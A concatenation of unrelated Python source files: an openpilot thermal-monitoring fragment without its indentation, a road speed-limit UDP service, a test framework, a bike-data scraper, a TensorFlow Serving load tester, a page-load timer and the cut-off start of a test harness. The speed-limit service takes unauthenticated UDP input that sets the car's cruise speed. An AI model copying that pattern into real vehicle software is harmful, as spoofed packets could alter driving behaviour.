msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
    """Launch the hardware-state and thermald worker threads and supervise them."""
    hw_queue = queue.Queue(maxsize=1)
    end_event = threading.Event()
    workers = [
        threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
        threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
    ]
    for worker in workers:
        worker.start()
    try:
        # Supervise: as soon as any worker dies, tear everything down.
        while True:
            time.sleep(1)
            if any(not worker.is_alive() for worker in workers):
                break
    finally:
        end_event.set()
        for worker in workers:
            worker.join()

if __name__ == "__main__":
    main()
|
road_speed_limiter.py | import json
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import interp
from common.realtime import sec_since_boot
from selfdrive.kegman_kans_conf import kegman_kans_conf
kegman_kans = kegman_kans_conf()
CAMERA_SPEED_FACTOR = float(kegman_kans.conf['CAMERA_SPEED_FACTOR'])
class Port:
    """UDP ports used to talk to the companion road-limit phone app."""
    BROADCAST_PORT = 2899  # server -> app discovery broadcasts
    RECEIVE_PORT = 2843    # app -> server data (fallback bind port)
    LOCATION_PORT = 2911   # server -> app GPS location stream
class RoadLimitSpeedServer:
    """UDP server that receives road speed-limit data from a companion app.

    Broadcasts a discovery message so the app can find this device, then
    accepts JSON datagrams containing the current road-limit / safety-camera
    information, which the rest of the process reads via get_limit_val() and
    expires via check().
    """

    def __init__(self):
        self.json_road_limit = None   # most recent 'road_limit' payload from the app
        self.active = 0               # app-reported active flag
        self.last_updated = 0         # sec_since_boot() of the last road_limit update
        self.last_updated_active = 0  # sec_since_boot() of the last 'active' update
        self.last_exception = None
        self.lock = threading.Lock()
        self.remote_addr = None       # (ip, port) of the most recent app datagram

        broadcast = Thread(target=self.broadcast_thread, args=[])
        broadcast.daemon = True  # Thread.setDaemon() is deprecated; set the attribute
        broadcast.start()

        #gps = Thread(target=self.gps_thread, args=[])
        #gps.daemon = True
        #gps.start()

    def gps_thread(self):
        """Stream GPS fixes to the app's LOCATION_PORT (currently disabled)."""
        sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            while True:
                try:
                    sm.update()
                    if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
                        location = sm['gpsLocationExternal']
                        json_location = json.dumps([
                            location.latitude,
                            location.longitude,
                            location.altitude,
                            location.speed,
                            location.bearingDeg,
                            location.accuracy,
                            location.timestamp,
                            location.source,
                            location.vNED,
                            location.verticalAccuracy,
                            location.bearingAccuracyDeg,
                            location.speedAccuracy,
                        ])
                        address = (self.remote_addr[0], Port.LOCATION_PORT)
                        sock.sendto(json_location.encode(), address)
                    else:
                        time.sleep(1.)
                except Exception as e:
                    print("exception", e)
                    time.sleep(1.)

    def get_broadcast_address(self):
        """Return the broadcast IP of wlan0, or None if it cannot be determined."""
        try:
            # `with` closes the socket; the original leaked it on every call.
            with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
                # 0x8919 = SIOCGIFBRDADDR; bytes 20:24 of the result hold the address.
                ip = fcntl.ioctl(
                    s.fileno(),
                    0x8919,
                    struct.pack('256s', 'wlan0'.encode('utf-8'))
                )[20:24]
            return socket.inet_ntoa(ip)
        except Exception:
            return None

    def broadcast_thread(self):
        """Periodically announce this service so the phone app can discover it."""
        broadcast_address = None
        frame = 0
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            try:
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
                while True:
                    try:
                        # Re-resolve the broadcast address every 10 frames (~50s)
                        # in case the network comes up later or changes.
                        if broadcast_address is None or frame % 10 == 0:
                            broadcast_address = self.get_broadcast_address()
                        print('broadcast_address', broadcast_address)
                        if broadcast_address is not None:
                            address = (broadcast_address, Port.BROADCAST_PORT)
                            sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
                    except Exception:
                        pass
                    time.sleep(5.)
                    frame += 1
            except Exception:
                pass

    def udp_recv(self, sock):
        """Poll sock for one datagram and update state from its JSON payload.

        Returns True when a datagram was received (even if malformed).
        """
        ret = False
        try:
            ready = select.select([sock], [], [], 1.)
            ret = bool(ready[0])
            if ret:
                data, self.remote_addr = sock.recvfrom(2048)
                json_obj = json.loads(data.decode())

                # SECURITY: the original code passed json_obj['cmd'] to
                # os.system(), i.e. arbitrary remote command execution from an
                # unauthenticated UDP packet.  (It also never worked: `os` was
                # never imported, so it raised a NameError that the bare except
                # swallowed.)  Remote command execution is deliberately removed.

                if 'echo' in json_obj:
                    try:
                        echo = json.dumps(json_obj["echo"])
                        sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
                    except Exception:
                        pass

                with self.lock:
                    try:
                        if 'active' in json_obj:
                            self.active = json_obj['active']
                            self.last_updated_active = sec_since_boot()
                    except Exception:
                        pass
                    if 'road_limit' in json_obj:
                        self.json_road_limit = json_obj['road_limit']
                        self.last_updated = sec_since_boot()
        except Exception:
            # Malformed packet or socket error: drop the cached limit data.
            with self.lock:
                self.json_road_limit = None
        return ret

    def check(self):
        """Expire stale data: road limit after 20s, the active flag after 10s."""
        now = sec_since_boot()
        if now - self.last_updated > 20.:
            with self.lock:
                self.json_road_limit = None
        if now - self.last_updated_active > 10.:
            self.active = 0

    def get_limit_val(self, key, default=None):
        """Return self.json_road_limit[key], or `default` when missing/unset."""
        try:
            if self.json_road_limit is None:
                return default
            if key in self.json_road_limit:
                return self.json_road_limit[key]
        except Exception:
            pass
        return default
def main():
    """Entry point: receive app datagrams and republish them as 'roadLimitSpeed'."""
    server = RoadLimitSpeedServer()
    road_limit_pub = messaging.pub_sock('roadLimitSpeed')

    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        try:
            # Prefer the legacy port 843; fall back when it cannot be bound
            # (e.g. privileged-port restrictions).
            try:
                sock.bind(('0.0.0.0', 843))
            except:
                sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
            sock.setblocking(False)

            while True:
                if server.udp_recv(sock):
                    dat = messaging.new_message()
                    dat.init('roadLimitSpeed')
                    rls = dat.roadLimitSpeed
                    rls.active = server.active
                    rls.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
                    rls.isHighway = server.get_limit_val("is_highway", False)
                    rls.camType = server.get_limit_val("cam_type", 0)
                    rls.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
                    rls.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
                    rls.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
                    rls.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
                    rls.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
                    road_limit_pub.send(dat.to_bytes())
                server.check()
        except Exception as e:
            server.last_exception = e
class RoadSpeedLimiter:
    """Client side: subscribes to 'roadLimitSpeed' messages and turns them
    into a target maximum speed for the cruise controller."""

    def __init__(self):
        self.slowing_down = False  # currently decelerating for a camera/section
        self.start_dist = 0        # padded distance at which slowing began
        self.longcontrol = True
        self.sock = messaging.sub_sock("roadLimitSpeed")
        self.roadLimitSpeed = None  # last received message payload

    def recv(self):
        # Non-blocking poll; the previous value is kept when nothing new arrived.
        try:
            dat = messaging.recv_sock(self.sock, wait=False)
            if dat is not None:
                self.roadLimitSpeed = dat.roadLimitSpeed
        except:
            pass

    def get_active(self):
        """Return the server's 'active' flag (0 when no data has arrived yet)."""
        self.recv()
        if self.roadLimitSpeed is not None:
            return self.roadLimitSpeed.active
        return 0

    def get_max_speed(self, CS, v_cruise_speed):
        """Compute a camera/section-limited maximum speed.

        Returns (max_speed, limit_speed, left_dist, first_started, log), where
        max_speed == 0 means "no restriction".  CS.vEgo is multiplied by 3.6,
        so speeds are presumably km/h and v_ego m/s -- TODO confirm units.
        """
        log = ""
        self.recv()
        if self.roadLimitSpeed is None:
            return 0, 0, 0, False, ""
        try:
            road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
            is_highway = self.roadLimitSpeed.isHighway
            cam_type = int(self.roadLimitSpeed.camType)
            cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
            cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
            section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
            section_left_dist = self.roadLimitSpeed.sectionLeftDist
            # Plausibility bounds for reported limits; tighter off-highway.
            if is_highway is not None:
                if is_highway:
                    MIN_LIMIT = 40
                    MAX_LIMIT = 120
                else:
                    MIN_LIMIT = 30
                    MAX_LIMIT = 100
            else:
                MIN_LIMIT = 30
                MAX_LIMIT = 120
            # log = "RECV: " + str(is_highway)
            # log += ", " + str(cam_limit_speed)
            # log += ", " + str(cam_limit_speed_left_dist)
            # log += ", " + str(section_limit_speed)
            # log += ", " + str(section_left_dist)
            v_ego = CS.vEgo
            if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
                # A speed camera lies ahead.
                diff_speed = v_ego * 3.6 - cam_limit_speed
                if self.longcontrol:
                    # Start slowing earlier the more we exceed the limit.
                    sec = interp(diff_speed, [10., 30.], [20., 23.])
                    if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < v_ego * sec):
                        if not self.slowing_down:
                            # Remember a padded start distance for the ramp below.
                            self.start_dist = cam_limit_speed_left_dist * 1.2
                            self.slowing_down = True
                            first_started = True
                        else:
                            first_started = False
                        # Linearly ramp the allowed overshoot down with distance.
                        base = self.start_dist / 1.2 * 0.65
                        td = self.start_dist - base
                        d = cam_limit_speed_left_dist - base
                        if d > 0 and td > 0. and diff_speed > 0 and (section_left_dist is None or section_left_dist < 10):
                            pp = d / td
                        else:
                            pp = 0
                        return cam_limit_speed * CAMERA_SPEED_FACTOR + int(
                            pp * diff_speed), cam_limit_speed, cam_limit_speed_left_dist, first_started, log
                self.slowing_down = False
                return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
            elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
                # Inside an average-speed enforcement section.
                if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
                    if not self.slowing_down:
                        self.slowing_down = True
                        first_started = True
                    else:
                        first_started = False
                    return section_limit_speed * CAMERA_SPEED_FACTOR, section_limit_speed, section_left_dist, first_started, log
                self.slowing_down = False
                return 0, section_limit_speed, section_left_dist, False, log
        except Exception as e:
            log = "Ex: " + str(e)
            pass
        self.slowing_down = False
        return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
    """Return the app's 'active' flag via the lazily-created singleton."""
    global road_speed_limiter
    road_speed_limiter = road_speed_limiter or RoadSpeedLimiter()
    return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(CS, v_cruise_speed):
    """Delegate to the lazily-created RoadSpeedLimiter singleton."""
    global road_speed_limiter
    road_speed_limiter = road_speed_limiter or RoadSpeedLimiter()
    return road_speed_limiter.get_max_speed(CS, v_cruise_speed)
if __name__ == "__main__":
main() |
test_framework.py | from __future__ import print_function
class AssertException(Exception):
    """Raised when a check fails and the caller requested allow_raise."""
    pass
def format_message(message):
    """Encode newlines so the message survives line-based output parsing."""
    return "<:LF:>".join(message.split("\n"))
def display(type, message, label="", mode=""):
    """Print a framework marker line of the form <TYPE:MODE:label>message."""
    marker = "<{}:{}:{}>".format(type.upper(), mode.upper(), label)
    print("\n" + marker + format_message(message))
def expect(passed=None, message=None, allow_raise=False):
    """Report a single test result; optionally raise AssertException on failure."""
    if passed:
        display('PASSED', 'Test Passed')
        return
    failure = message if message else "Value is not what was expected"
    display('FAILED', failure)
    if allow_raise:
        raise AssertException(failure)
def assert_equals(actual, expected, message=None, allow_raise=False):
    """Check that actual == expected, reporting a descriptive message."""
    detail = "{0} should equal {1}".format(repr(actual), repr(expected))
    full_message = detail if message is None else message + ": " + detail
    expect(actual == expected, full_message, allow_raise)
def assert_not_equals(actual, expected, message=None, allow_raise=False):
    """Check that actual != expected, reporting a descriptive message."""
    detail = "{0} should not equal {1}".format(repr(actual), repr(expected))
    full_message = detail if message is None else message + ": " + detail
    expect(not (actual == expected), full_message, allow_raise)
def expect_error(message, function, exception=Exception):
    """Pass iff calling function() raises the given exception type.

    Other exception types are swallowed and count as a failure.
    """
    raised = False
    try:
        function()
    except exception:
        raised = True
    except Exception:
        pass
    expect(raised, message)
def expect_no_error(message, function, exception=BaseException):
    """Pass iff calling function() does not raise the given exception type.

    Exceptions outside the watched type are tolerated and still count as a pass.
    """
    try:
        function()
    except exception as err:
        fail("{}: {}".format(message or "Unexpected exception", repr(err)))
        return
    except Exception:
        pass
    pass_()
def pass_(): expect(True)  # record an unconditional pass
def fail(message): expect(False, message)  # record a failure with the given message
def assert_approx_equals(
        actual, expected, margin=1e-9, message=None, allow_raise=False):
    """Check that actual is within an absolute-or-relative margin of expected."""
    template = "{0} should be close to {1} with absolute or relative margin of {2}"
    detail = template.format(repr(actual), repr(expected), repr(margin))
    full_message = detail if message is None else message + ": " + detail
    # Dividing by max(|actual|, |expected|, 1) makes the comparison relative
    # for large magnitudes and absolute near zero.
    scale = max(abs(actual), abs(expected), 1)
    expect(abs((actual - expected) / scale) < margin, full_message, allow_raise)
'''
Usage:
@describe('describe text')
def describe1():
@it('it text')
def it1():
# some test cases...
'''
def _timed_block_factory(opening_text):
    # Factory producing the @describe / @it decorators: each prints an opening
    # marker, runs the decorated function immediately at decoration time,
    # reports failures/errors, and prints the elapsed time in milliseconds.
    from timeit import default_timer as timer
    from traceback import format_exception
    from sys import exc_info
    def _timed_block_decorator(s, before=None, after=None):
        display(opening_text, s)
        def wrapper(func):
            # NOTE: func is executed right here; the decorator intentionally
            # returns None instead of a callable.
            if callable(before):
                before()
            time = timer()
            try:
                func()
            except AssertionError as e:
                display('FAILED', str(e))
            except Exception:
                fail('Unexpected exception raised')
                tb_str = ''.join(format_exception(*exc_info()))
                display('ERROR', tb_str)
            display('COMPLETEDIN', '{:.2f}'.format((timer() - time) * 1000))
            if callable(after):
                after()
        return wrapper
    return _timed_block_decorator
describe = _timed_block_factory('DESCRIBE')  # section-level decorator
it = _timed_block_factory('IT')              # test-level decorator
'''
Timeout utility
Usage:
@timeout(sec)
def some_tests():
any code block...
Note: Timeout value can be a float.
'''
def timeout(sec):
    """Decorator: run the function in a subprocess, failing if it exceeds sec seconds."""
    def wrapper(func):
        from multiprocessing import Process
        msg = 'Should not throw any exceptions inside timeout'
        def wrapped():
            expect_no_error(msg, func)
        child = Process(target=wrapped)
        child.start()
        child.join(sec)
        if child.is_alive():
            # Deadline passed: report the failure and reap the subprocess.
            fail('Exceeded time limit of {:.3f} seconds'.format(sec))
            child.terminate()
            child.join()
    return wrapper
|
operations.py | '''
Date: 2018-03-22
Because here we want to get the data from openweatherapi and bike stations, I use multiprocessing to get data.
The weather is fetched once per hour and the bike stations once every 5 minutes.
'''
from multiprocessing import Process
import requests
import json
import time
import mysql.connector
from analytics import model
from db import query, keyring
def buildModel(sleeptime):
    '''Rebuilds the RandomForestRegressor model with the most up to date data'''
    while True:
        # Constructing the model from the database is the useful side effect;
        # the object itself is discarded immediately afterwards.
        rebuilt = model.model(from_data=True)
        del rebuilt
        time.sleep(sleeptime)
def scrape(url, sleeptime, f):
    '''Scrapes data from a url and applies a named function f to it.

    Fetches JSON from `url`, passes the decoded object to `f`, then sleeps
    `sleeptime` seconds, forever.

    BUG FIX: the original only slept on success, so while the network or
    endpoint was down the bare `except:` made this a busy retry loop that
    hammered the API; it also swallowed KeyboardInterrupt/SystemExit.
    '''
    while True:
        try:
            response = requests.get(url)
            data = json.loads(response.text)
            f(data)
        except Exception as e:
            # Narrowed from a bare `except:` so Ctrl-C still works.
            print('request failed:', e)
        # Sleep on both the success and failure paths.
        time.sleep(sleeptime)
def insertWeather(rawData):
    '''Inserts weather data from the open weather api into our database.

    BUG FIX: the INSERT statement was assigned to a local variable named
    `query`, which shadowed the imported `db.query` module for the whole
    function body, so the earlier `query.makeCnx()` call raised
    UnboundLocalError.  The SQL string is now named `insert_sql`.
    '''
    if rawData['cod'] == '200':
        dt = rawData['list'][0]['dt']
        # connect to the database
        cnx = query.makeCnx()
        cursor = cnx.cursor()
        # dt acts as the row identity: check whether it has already been added
        cursor.execute('SELECT dt FROM weather where dt = %s', (dt,))
        exist = cursor.fetchall()
        if not exist:
            insert_sql = ('INSERT INTO weather (dt, temp, pressure, humidity, '
                          'temp_min, temp_max, wind_speed, wind_deg, description, '
                          'icon, main) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)')
            data = rawData['list'][0]
            para = (dt, data['main']['temp'], data['main']['pressure'],
                    data['main']['humidity'], data['main']['temp_min'],
                    data['main']['temp_max'], data['wind']['speed'],
                    data['wind']['deg'], data['weather'][0]['description'],
                    data['weather'][0]['icon'], data['weather'][0]['main'])
            cursor.execute(insert_sql, para)
            cnx.commit()
        cursor.close()
        cnx.close()
def insertLiveDB(data):
    '''Inserts new stand data (from the bikes api) into the database. Used by webscraper.

    FIX: removed the useless `global psd` (psd was never defined or used) and
    hoisted the loop-invariant INSERT template out of the loop.
    '''
    cnx = query.makeCnx()
    cursor = cnx.cursor()
    add_stand = ("INSERT INTO dynamic_bikes"
                 "(time, number, status, bike_stands, available_bike_stands, available_bikes) "
                 "VALUES (%s, %s, %s, %s, %s, %s)")
    for thing in data:
        # (time, number) identifies a reading; skip rows already stored.
        cursor.execute('SELECT time, number From dynamic_bikes WHERE time=%s AND number=%s',
                       (thing['last_update'], thing['number']))
        exist = cursor.fetchall()
        if not exist:
            data_stand = (thing['last_update'], thing['number'], thing['status'],
                          thing['bike_stands'], thing['available_bike_stands'],
                          thing['available_bikes'])
            cursor.execute(add_stand, data_stand)
            # Make sure data is committed to the database
            cnx.commit()
    cursor.close()
    cnx.close()
def main():
    '''Launch the weather, bike-stand and model-rebuild worker processes and wait on them.'''
    # weather changes slowly: fetch it once per hour
    weather = Process(target=scrape,
                      args=('http://api.openweathermap.org/data/2.5/find?q=Dublin&units=imperial&type=accurate&mode=json&APPID=' + keyring.getWeatherKey(),
                            3600, insertWeather))
    # get bike stations every 5 minutes
    stands = Process(target=scrape,
                     args=('https://api.jcdecaux.com/vls/v1/stations?contract=dublin&apiKey=' + keyring.getBikeKey(),
                           300, insertLiveDB))
    # BUG FIX: Process's args must be an iterable; (604800) is just the int
    # 604800, which made Process raise a TypeError.  (604800,) = rebuild weekly.
    models = Process(target=buildModel, args=(604800,))
    weather.start()
    stands.start()
    models.start()
    weather.join()
    stands.join()
    models.join()
if __name__ == '__main__':
    main()
|
tensorflow_serving_client_workload.py | # Lint as: python2, python3
"""Tensorflow Serving client workload.
Performs image classification requests against a Tensorflow Model Server.
Inspired by
https://github.com/tensorflow/serving/blob/master/tensorflow_serving/example/resnet_client_grpc.py
This client-side load generator does the following:
* launches a specified number of worker threads (FLAGS.num_threads).
* each thread chooses a random image from the dataset (FLAGS.image_directory)
and sends a prediction request to the server, notes the latency,
and repeats with a new random image.
* once the specified time period is up (FLAGS.runtime),
the results are printed to stdout.
The following stats are reported:
* number of successful prediction requests
* number of failed requests
* throughput (successful requests / second)
* runtime
* number of threads used
* a list of all measured latencies
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import time
from absl import app
from absl import flags
import grpc
from grpc.framework.interfaces.face.face import ExpirationError
import tensorflow as tf
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2_grpc
ILSVRC_VALIDATION_IMAGES = 'ILSVRC2012_img_val'
MODEL_NAME = 'resnet'
RANDOM_SEED = 98103
DEFAULT_TIMEOUT = 3600 # one hour "infinite" timeout
FLAGS = flags.FLAGS
flags.DEFINE_string('server', 'localhost:8500', 'PredictionService host:port')
flags.DEFINE_string(
'image_directory', ILSVRC_VALIDATION_IMAGES,
'Path to a directory containing images to be classified. '
'A random image from the directory will be chosen for '
'every classification request.')
flags.DEFINE_integer('runtime', 60, 'Runtime in seconds.')
flags.DEFINE_integer('num_threads', 16,
'Number of concurrent worker threads to launch.')
flags.DEFINE_integer('rpc_timeout', DEFAULT_TIMEOUT,
'Number of seconds to set the rpc timeout to.')
def get_files_in_directory_sorted(directory):
  """Returns a list of files in directory, sorted alphabetically.

  Sub-directories are skipped; only regular files are returned.
  """
  candidates = (os.path.join(directory, name) for name in os.listdir(directory))
  return sorted(path for path in candidates if os.path.isfile(path))
class TfServingClientWorkload(object):
  """Tensorflow Serving client workload generator.

  See module-level docstring for more details.
  """

  def __init__(self):
    # Counters and the latency list below are shared across worker threads
    # and guarded by thread_lock.
    self.thread_lock = threading.Lock()
    self.num_completed_requests = 0
    self.num_failed_requests = 0
    self.latencies = []
    self.file_list = get_files_in_directory_sorted(FLAGS.image_directory)
    self.num_images = len(self.file_list)
    channel = grpc.insecure_channel(FLAGS.server)
    self.stub = prediction_service_pb2_grpc.PredictionServiceStub(channel)
    # Fix random seed so that sequence of images sent to server is
    # deterministic.
    random.seed(RANDOM_SEED)

  def get_random_image(self):
    """Returns a random image path from self.file_list."""
    random_index = random.randint(0, self.num_images - 1)
    return self.file_list[random_index]

  def classify_random_image(self):
    """Chooses a random image and sends a prediction request to the server.

    If a response is received before the request times out, its latency is
    saved, and the request is counted as successful. If the request times out
    or otherwise errors, its latency is discarded, and it is counted as a
    failed request.
    """
    image = self.get_random_image()
    with open(image, 'rb') as f:
      data = f.read()
    request = predict_pb2.PredictRequest()
    request.model_spec.name = MODEL_NAME
    request.model_spec.signature_name = 'serving_default'
    request.inputs['image_bytes'].CopyFrom(
        # Uses version 1 of the TensorFlow protobuf
        tf.compat.v1.make_tensor_proto(data, shape=[1]))
    try:
      start_time = time.time()
      self.stub.Predict(request, FLAGS.rpc_timeout)
      end_time = time.time()
      with self.thread_lock:
        self.num_completed_requests += 1
        self.latencies.append(end_time - start_time)
    except ExpirationError:
      # Timed-out requests count as failures; their latency is discarded.
      with self.thread_lock:
        self.num_failed_requests += 1

  def run_worker_thread(self):
    """Continuously calls classify_random_image until time is up."""
    while (datetime.now() - self.start_time).seconds < FLAGS.runtime:
      self.classify_random_image()

  def start(self):
    """Creates and launches worker threads and waits for them to finish."""
    threads = []
    for _ in range(FLAGS.num_threads):
      threads.append(threading.Thread(target=self.run_worker_thread))
    self.start_time = datetime.now()
    for t in threads:
      t.start()
    for t in threads:
      t.join()
    self.end_time = datetime.now()

  def print_results(self, out=sys.stdout):
    """Prints test results, to stdout by default."""
    actual_runtime = (self.end_time - self.start_time).total_seconds()
    req_per_second = self.num_completed_requests / actual_runtime
    out.write('Completed requests: %s\n' % self.num_completed_requests)
    out.write('Failed requests: %s\n' % self.num_failed_requests)
    out.write('Runtime: %s\n' % actual_runtime)
    out.write('Number of threads: %s\n' % FLAGS.num_threads)
    out.write('Throughput: %s\n' % req_per_second)
    out.write('Latency:\n')
    for latency in self.latencies:
      out.write(str(latency) + '\n')
def main(argv):
  """Runs the test and prints results to stdout."""
  del argv  # unused
  workload = TfServingClientWorkload()
  workload.start()
  workload.print_results()


if __name__ == '__main__':
  app.run(main)
|
soup.py | #!/usr/bin/env python
import threading
from urlparse import urlparse
from urllib import urlopen
from bs4 import BeautifulSoup
from time import time
import sys
import logging
logger = logging.getLogger(__name__)
def worker(img, url):
    """
    thread worker function: download one <img> resource to measure its load time
    """
    src = img.get('src')
    logger.debug("src: {0}".format(src))
    if src is None:
        return
    parsed = urlparse(src)
    if len(parsed.netloc) == 0:
        # Relative URL: resolve against the page's scheme and host.
        src = url.scheme + '://' + url.netloc + '/' + src
    response = urlopen(src)
    data = response.read()
    logger.debug(response.geturl())
    return
class Soup(object):
    """Measures total load time of a page including all of its <img> resources."""

    def __init__(self, url):
        # url: address of the page to measure
        self.url = url

    def measure_load_time(self):
        """Fetch the page, download every <img> concurrently, and return the
        elapsed wall-clock time in seconds."""
        time_begin = time()
        start_url = urlparse(self.url)
        html = urlopen(self.url)
        bsObj = BeautifulSoup(html.read(), 'html.parser')
        threads = []
        for img in bsObj.findAll('img'):
            # One thread per image; named after its src for easier debugging.
            t = threading.Thread(target=worker, name=img.get('src'), args=(img, start_url))
            threads.append(t)
            t.start()
        for thread in threads:
            thread.join()
        time_end = time()
        return time_end - time_begin
if __name__ == '__main__':
    if len(sys.argv) != 2:
        sys.stderr.write("usage: {0} url\n".format(sys.argv[0]))
        # BUG FIX: use sys.exit() -- the bare exit() builtin is injected by the
        # site module and is not guaranteed to exist (e.g. under python -S).
        sys.exit(1)
    soup = Soup(url=sys.argv[1])
    print(soup.measure_load_time())
|
testharness.py | #!/usr/bin/env python
import sys
import os
import os.path
import glob
import time
try:
#python2 world
from StringIO import StringIO
except ImportError:
#python3 world
from io import StringIO
try:
import fluidity.regressiontest as regressiontest
except ImportError:
# try again by adding the path "../python" relative to testharness' own location to sys.path
head,tail = os.path.split(sys.argv[0])
python_path = os.path.abspath(os.path.join(head,'..','python'))
sys.path.append(python_path)
import fluidity.regressiontest as regressiontest
import traceback
import multiprocessing
import Queue
import xml.parsers.expat
import string
try:
from junit_xml import TestSuite, TestCase
except ImportError:
class TestSuite(object):
def __init__(self, name, test_cases):
self.test_cases=test_cases
def to_file(self,*args):
print "cannot generate xml report without junit_xml module."
class TestCase(object):
def __init__(self,*args,**kwargs):
pass
def add_failure_info(self,*args,**kwargs):
pass
# make sure we use the correct version of regressiontest
sys.path.insert(0, os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]), os.pardir, "python"))
import fluidity.regressiontest as regressiontest
try:
import xml.etree.ElementTree as etree
except ImportError:
import elementtree.ElementTree as etree
class TestHarness:
    """Discovers, filters, runs and reports on Fluidity regression tests.

    Tests are "testproblem" XML documents found under the examples/, tests/
    and longtests/ directories next to this script.  Python 2 code.
    """

    def __init__(self, length="any", parallel="any", exclude_tags=None,
                 tags=None, file="", from_file=None,
                 verbose=True, justtest=False,
                 valgrind=False, genpbs=False, exit_fails=False, xml_outfile=""):
        self.tests = []
        self.verbose = verbose
        self.length = length
        self.parallel = parallel
        self.passcount = 0
        self.failcount = 0
        self.warncount = 0
        self.teststatus = []
        self.completed_tests = []
        self.justtest = justtest
        self.valgrind = valgrind
        self.genpbs = genpbs
        # junit-style report container (dummy classes stand in when the
        # junit_xml module is unavailable)
        self.xml_parser=TestSuite('TestHarness',[])
        self.cwd=os.getcwd()
        self.iolock = multiprocessing.Lock()
        self.xml_outfile=xml_outfile
        self.exit_fails=exit_fails
        fluidity_command = self.decide_fluidity_command()
        if file == "":
            print "Test criteria:"
            print "-" * 80
            print "length: ", length
            print "parallel: ", parallel
            # NOTE(review): 'options' is the module-level optparse result set
            # up in the __main__ section; this attribute only exists when run
            # as a script -- confirm before importing this class elsewhere.
            print "threads: ", options.thread_count
            print "tags to include: ", tags
            print "tags to exclude: ", exclude_tags
            print "-" * 80
            print
        # step 1. form a list of all the xml files to be considered.
        xml_files = []
        rootdir = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), os.pardir))
        dirnames = []
        testpaths = ["examples", "tests", "longtests"]
        for directory in testpaths:
            if os.path.exists(os.path.join(rootdir, directory)):
                dirnames.append(directory)
        testdirs = [ os.path.join( rootdir, x ) for x in dirnames ]
        for directory in testdirs:
            subdirs = [ os.path.join(directory, x) for x in os.listdir(directory)]
            for subdir in subdirs:
                g = glob.glob1(subdir, "*.xml")
                for xml_file in g:
                    try:
                        p = etree.parse(os.path.join(subdir, xml_file))
                        x = p.getroot()
                        if x.tag == "testproblem":
                            xml_files.append(os.path.join(subdir, xml_file))
                    except xml.parsers.expat.ExpatError:
                        print "Warning: %s mal-formed" % xml_file
                        traceback.print_exc()
        # step 2. if the user has specified a particular file, let's use that.
        if file != "":
            files = [file]
        elif from_file:
            try:
